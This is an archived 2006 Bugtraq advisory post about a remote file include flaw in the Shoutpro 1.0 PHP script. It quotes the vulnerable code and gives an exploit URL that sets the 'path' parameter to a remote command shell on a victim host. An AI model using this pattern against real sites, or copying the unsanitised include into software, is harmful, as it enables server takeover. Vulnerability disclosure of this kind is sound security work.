Bugtraq mailing list archives

Shoutpro 1.0 Version - Remote File Include Vulnerability

From: SpC-x () Bsdmail Org
Date: 13 Jun 2006 17:39:42 -0000

# SaVSaK.CoM | SpC-x - The_BeKiR |

# Shoutpro 1.0 Version - Remote File Include Vulnerability

# Risk : High

# Class: Remote

# Script : Shoutpro

# Credits : SpC-x

# Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

# Code :

# include("config.php");
# include("functions.php");
# if ($path){
#       $ips = file("$path/lists/bannedips.php");
# } else {
#       $ips = file("lists/bannedips.php");
# }
# if (in_array($REMOTE_ADDR,$ips)) {   
#       echo($bannedmessage);
#       die;
# }

# Vulnerable :

# http://www.victim.com/Shoutpro/include.php?path=Command-Shell

Current thread:

Re: Shoutpro 1.0 Version - Remote File Include Vulnerability Steven M. Christey (Jun 13)
- <Possible follow-ups>
- Shoutpro 1.0 Version - Remote File Include Vulnerability SpC-x (Jun 13)